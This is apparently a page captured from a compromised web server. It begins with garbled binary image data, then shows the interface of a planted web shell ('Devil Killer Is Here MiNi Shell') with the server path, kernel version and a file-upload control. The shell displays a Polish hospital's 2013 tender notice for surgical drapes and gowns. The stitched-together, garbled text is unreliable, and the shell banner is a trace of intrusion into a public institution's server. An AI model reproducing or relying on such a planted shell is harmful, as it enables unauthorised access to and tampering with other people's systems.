JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130219/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130219/68702-N-2013.html

<p class="kh_header"><b>Sucha Beskidzka: Dostawa ubrań i obłożeń  
chirurgicznych z włókniny i flizeliny</b><br>
<b>Numer ogłoszenia: 68702 - 2013; data zamieszczenia: 19.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Opieki  Zdrowotnej , ul. Szpitalna 22, 34-200 Sucha Beskidzka, woj. małopolskie, tel. (033) 872 31 11, faks (033) 872 31 11.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zozsuchabeskidzka.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa ubrań i obłożeń  
chirurgicznych z włókniny i flizeliny.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa ubrań i obłożeń  
chirurgicznych z włókniny i flizeliny.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 31.98.00.00-4, 33.19.90.00-1, 33.77.20.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków udziału w postępowaniu stosownie do treści art. 22 ust.1 ustawy Pzp, że spełnia warunki dotyczące:
a) posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania,</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków udziału w postępowaniu stosownie do treści art. 22 ust.1 ustawy Pzp, że spełnia warunki dotyczące:
a) posiadania wiedzy i doświadczenia,
W celu wykazania spełnienia warunku dotyczącego posiadania wiedzy i doświadczenia, Zamawiający wymaga, aby dostawca wykonał co najmniej dwie dostawy w okresie ostatnich trzech lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, odpowiadających swoim rodzajem dostawom stanowiącym przedmiot zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków udziału w postępowaniu stosownie do treści art. 22 ust.1 ustawy Pzp, że spełnia warunki dotyczące:
a) dysponowania odpowiednim potencjałem technicznym</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków udziału w postępowaniu stosownie do treści art. 22 ust.1 ustawy Pzp, że spełnia warunki dotyczące:
a) dysponowania odpowiednimi osobami zdolnymi do wykonania zamówienia,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków udziału w postępowaniu stosownie do treści art. 22 ust.1 ustawy Pzp, że spełnia warunki dotyczące:
a) sytuacji ekonomicznej i finansowej
W celu wykazania spełnienia warunku dotyczącego sytuacji ekonomicznej i finansowej spełnieniem będzie informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których Dostawca posiada rachunek, potwierdzająca wysokość posiadanych środków finansowych lub zdolność kredytową Dostawcy na kwotę nie mniejszą niż : 
Pakiet nr 1- 110.000,00zł
Pakiet nr 2- 37.000,00 zł
Pakiet nr 3- 2.500,00 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - Koszt kredytowania - 10</li>
<li>3 - Jakość - 30</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zmiana postanowień niniejszej umowy może być dokonana przez strony 
w formie pisemnej w drodze aneksu do niniejszej umowy, pod rygorem nieważności.
2.	Zmiany postanowień niniejszej umowy, są dopuszczalne wyłącznie w przypadku, gdy:
a)	nastąpiło obniżenie ceny jednostkowej asortymentu,
b)	nastąpila zmiana numeru katalogowego produktu
c)  sposobu konfekcjonowania
d) liczby opakowań
e) wystąpi przejściowy brak produktu z przyczyn leżacych po stronie producenta przy
   jednoczesnym dostarczeniu produktu zamiennego o parametrach nie gorszych od
   produktu objętego umową.
    f) zmiany stawki podatku VAT - związanej z przedmiotem umowy - w tym
       przypadku zmianie ulegnie kwota podatku VAT i cena brutto , cena netto
       pozostanie niezmienna, 
   g) w przypadku zmiany stawki podatku VAT w ramach niniejszej umowy zmiana
       stawki następuje z dniem wejścia w życie aktu prawnego zmieniającego stawkę.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zozsuchabeskidzka.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dział zamówień Publicznych Zespołu Opieki Zdrowotnej ul. Szpitalna 22, 34-200 Sucha Beskidzka, IV pięro, Blok B..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.03.2013 godzina 10:00, miejsce: Sekretariat Zespołu Opieki Zdrowotnej w Suchej Beskidzkiej ul. Szpitalna 22, Blok C, I piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet nr 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sterylna serweta włókninowa 3W 50x50 cm 	szt.	12000
Sterylna serweta włókninowa 3W 45x75 cm 	szt.	1000
Sterylna serweta włókninowa 3W 50x60cm z otworem 5 cm 	szt.	3500
Sterylna serweta włókninowa 3W 50x60cm z otworem samoprzylepnym 7cm	szt.	3500
Sterylna serweta włókninowa 2W samoprzylepna 75x90 cm 	szt.	500
Sterylna serweta włókninowa 2W 75x90 cm	szt.	500
Sterylna serweta włókninowa 2W 75x90 cm z regulowaną średnicą otworu	szt.	150
Sterylna serweta włókninowa 3W samoprzylepna 75x75cm	szt.	200
Sterylna serweta włókninowa 2W 90x150 cm	szt.	1300
Sterylna serweta na stolik Mayo 80cm x 145cm	szt.	800
Sterylna serweta włókninowa 3W 150x175 cm 	szt.	300
Sterylna serweta włókninowa 3W samoprzylepna 50x50 cm 	szt.	200
Sterylna serweta włókninowa 3W samoprzylepna 45x75 cm 	szt.	200
Sterylna serweta włókninowa 3W 75x90 cm z otworem 5 cm 	szt.	50
Sterylna serweta włókninowa 3W 120x150 cm z otworem samoprzylepnym 7cm	szt.	50
Sterylna serweta włókninowa 2W 95x120 cm	szt.	200
Sterylny zestaw uniwersalny, serwet włókninowych 2W na całej powierzchni (chłonność warstwy zewnętrznej min. 450%), odporność na penetrację płynów (zgodnie z EN 20811)>150 cm H2O, Skład zestawu: 1 serweta na stolik narzędziowy 140x190cm; 1 obłożenie stolika Mayo złożone teleskopowo 80x145cm; 1 samoprzylepna serweta operacyjna 150x240cm; 1 samoprzylepna serweta operacyjna 170x175cm; 2 samoprzylepne serwety operacyjne 75x90cm; 1 taśma samoprzylepna 10x50cm; 4 ręczniki celulozowe min. 30x30cm	kpl	2000
Sterylny zestaw do laparoskopii, serwet włókninowych 2W na całej powierzchni, skład zestawu: 3 x samoprzylepny opatrunek chłonny 7,2x5 cm, 2 x taśma samoprzylepna 10x50 cm, 1 x serweta na stolik Mayo 80x145 cm, 1 x serweta na stół narzędziowy 120x100 cm, 1 x serweta 170x260 cm z samoprzylepnym otworem 15x15 cm wypełnionym folią chirurgiczną 	kpl	150
Sterylny zestaw do zabiegów na kończynie, serwet włókninowych 2W z dodatkowymi obszarami chłonnych wzmocnień (chłonność min. 500%) w obrębie pola operacyjnego, skład zestawu: 1 serweta na stolik narzedziowy 140x190cm (wzmocnienie 75x190cm); 1 obłożenie stolika Mayo złożone teleskopowo 80x145cm (wzmocnienie 60x80cm); 1 serweta do zabiegów na kończynie 320x245cm; 7x10cm (wzmocnienie 150x105cm); 1 serweta pomocnicza 150x150cm; 1 osłona na kończynę 25x80cm; 2 taśmy samoprzylepne 10x50cm; 2 ręczniki celulozowe min. 30x30cm	kpl	300
Sterylny zestaw do chirurgii biodra, serwet włókninowych 2W z dodatkowymi obszarami chlonnych wzmocnień (chłonność min. 500%) w obrębie pola operacyjnego, skład zestawu: 1 serweta na stolik narzędziowy 140x190cm (wzmocnienie 75x190cm); 1 obłożenie stolika Mayo zlozone teleskopowo 80x145cm (wzmocnienie 60x80cm); 1 serweta samoprzylepna 170x300cm; 1 serweta samoprzylepna z wycieciem U 260x200cm, wyciecie U 6,5x90cm (wzmocnienie 160x150cm); 1 serweta pomocnicza 150x150cm; 1 serweta operacyjna 75x90cm; 1 oslona na konczyne 35x120cm; 2 taśmy samoprzylepne 10x50cm; 4 ręczniki celulozowe min. 30x30cm	kpl	200
Sterylny zestaw do chirurgii biodra MAX, serwet włókninowych 2W z dodatkowymi obszarami chłonnych wzmocnień (chłonność min. 500%) w obrębie pola operacyjnego, skład zestawu: 1 serweta na stolik narzędziowy 140x190cm (wzmocnienie 75x190cm); 1 obłożenie stolika Mayo zlozone teleskopowo 80x145cm (wzmocnienie 60x80cm); 2 serwety samoprzylepne 170x300cm; 1 serweta samoprzylepna z wycieciem U 260x200cm, wyciecie U 6,5x90cm (wzmocnienie 160x150cm); 1 serweta pomocnicza 150x150cm; 1 serweta operacyjna 75x90cm; 2 serwety operacyjne samoprzylepne 75x90cm; 1 osłona na kończynę 35x120cm; 2 taśmy samoprzylepne 10x50cm; 4 ręczniki celulozowe min. 30x30cm	kpl	150
Sterylny zestaw do PCNL, serwet wlókninowych min. 2W, sklad zestawu: 1 serweta na stół instrumentariuszki 150x 200 cm. 1 serweta z otworem samoprzylepnym 15x20cm i workiem do zbiórki płynów 170 x 300 cm (worek z sitem i zaworem)	kpl	40
Sterylny zestaw do zabiegów urologicznych, serwet wlókninowych 2W , sklad zestawu: 1 serweta na stolik narzedziowy 140x190cm ,1 serweta urologiczna z torbą do zbierania płynów (z sitem) 185x200cm z oknem 7x10 cm i na genitalia o średnicy 7 cm, 1 tasma samoprzylepna 10x50 cm, 2 ręczniki celulozowe min. 30x30 cm	kpl	20
Sterylny zestaw brzuszno-kroczowy, serwet wlókninowych 2W z dodatkowymi obszarami chłonnych wzmocnień (chłonność min. 500%) w obrębie pola operacyjnego. Skład zestawu: 1 serweta na stolik narzędziowy 140x190cm (wzmocnienie 75x190 cm), 1 obłożenie stolika Mayo złożone teleskopowo 80x145 cm (wmocnienie 60x80 cm) , 1 serweta brzuszno-kroczowa 230x250cm (wzmocnienie 60x120 cm; 85x50 cm) okna 19x29 cm (w kształcie nerki) i 9x12 cm (owalne), 2 ręczniki celulozowe min. 30x30cm	kpl	20
Sterylny zestaw ginekologiczny, serwet włókninowych 2W z dodatkowymi obszarami chłonnych wzmocnień (chłonność min. 500%) w obrębie pola operacyjnego. Skład zestawu: 1 serweta na stolik narzędziowy 140x190cm (wzmocnienie 75x190 cm), 1 obłożenie stolika Mayo złożone teleskopowo 80x145 cm (wmocnienie 60x80 cm) , 1 serweta ginekologiczna 290x250 cm (wzmocnienie 140x55 cm) okno 9x12 cm,
1 serweta do podłożenia pod pośladki 75x90 cm, 1 przeźroczysta samoprzylepna serweta do zakrycia okolicy odbytu 50x50 cm, 2 ręczniki celulozowe min. 30x30cm	kpl	20
Sterylny zestaw do artroskopii kolana, serwet wlókninowych 2W z workiem zbierajacym plyn, Sklad zestawu: 1 serweta na stolik narzedziowy 140x190cm, 1 oblozenie stolika Mayo złożone teleskopowo 80x145 cm, 1 serweta do artroskopii z workiem do zbiórki plynów 320x200 cm , 1 serweta pomocnicza 150x150 cm, 1 oslona na konczyne 25x80 cm, 2 tasmy samoprzylepne 10x50 cm, 2 reczniki celulozowe min. 30x30 cm	kpl	20
Sterylny zestaw porodowy, sklad zestawu: 1 serweta narzedziowa 100x150cm, 6 reczników celulozowych, 2 biale serwety dla noworodka 87x90cm, 2 serwety 45x75cm, 20 kompresów wlókninowych 10x10cm, 1 podklad nieprzemakalny z warstwą chlonnej celulozy 57x90cm, 1 tampon gazowy.	kpl	1200
Sterylny zestaw do otolaryngologii, serwet wlókninowych 2W, Sklad zestawu: 1 serweta na stolik narzedziowy 140x1600cm, 1 serweta z samoprzylepnym otworem (10cm) 250x170 cm , 1 recznik celulozowy min. 30x30 cm	kpl	150
Sterylny fartuch chirurgiczny wykonany z włókniny polipropylenowej typu SMMS o gramaturze 40 g/m2, szwy łączone ultradzwiękowo, rękaw zakończony elast. mankietem z dzianiny, wiazany na troki łączone kartonikiem (sterylne plecy) zapinany przy szyi na rzep, długość fartucha 115 cm, długość rękawa 69 - rozmiar M	szt.	1500
Sterylny fartuch chirurgiczny wykonany z włókniny polipropylenowej typu SMMS o gramaturze 40 gm2, szwy łączone ultradzwiękowo, rękaw zakończony elast. mankietem z dzianiny, wiazany na troki łączone kartonikiem (sterylne plecy) zapinany przy szyi na rzep, długość fartucha 125 cm, długość rękawa 80 - rozmiar L	szt.	2000
Sterylny fartuch chirurgiczny wykonany z włókniny polipropylenowej typu SMMS o gramaturze 40 gm2, szwy łączone ultradzwiękowo, rękaw zakończony elast. mankietem z dzianiny, wiazany na troki łączone kartonikiem (sterylne plecy) zapinany przy szyi na rzep, długość fartucha 140 cm, długość rękawa 87 - rozmiar XL	szt.	2500
Jednorazowy komplet operacyjny (bluza i spodnie) wykonany z włókniny polipropylenowej typu SMMS o gramaturze 38 gm2, kolor granatowy, rozmiar S	szt.	1500
Jednorazowy komplet operacyjny (bluza i spodnie) wykonany z włókniny polipropylenowej typu SMMS o gramaturze 38 gm2, kolor różowy, rozmiar M	szt.	2000
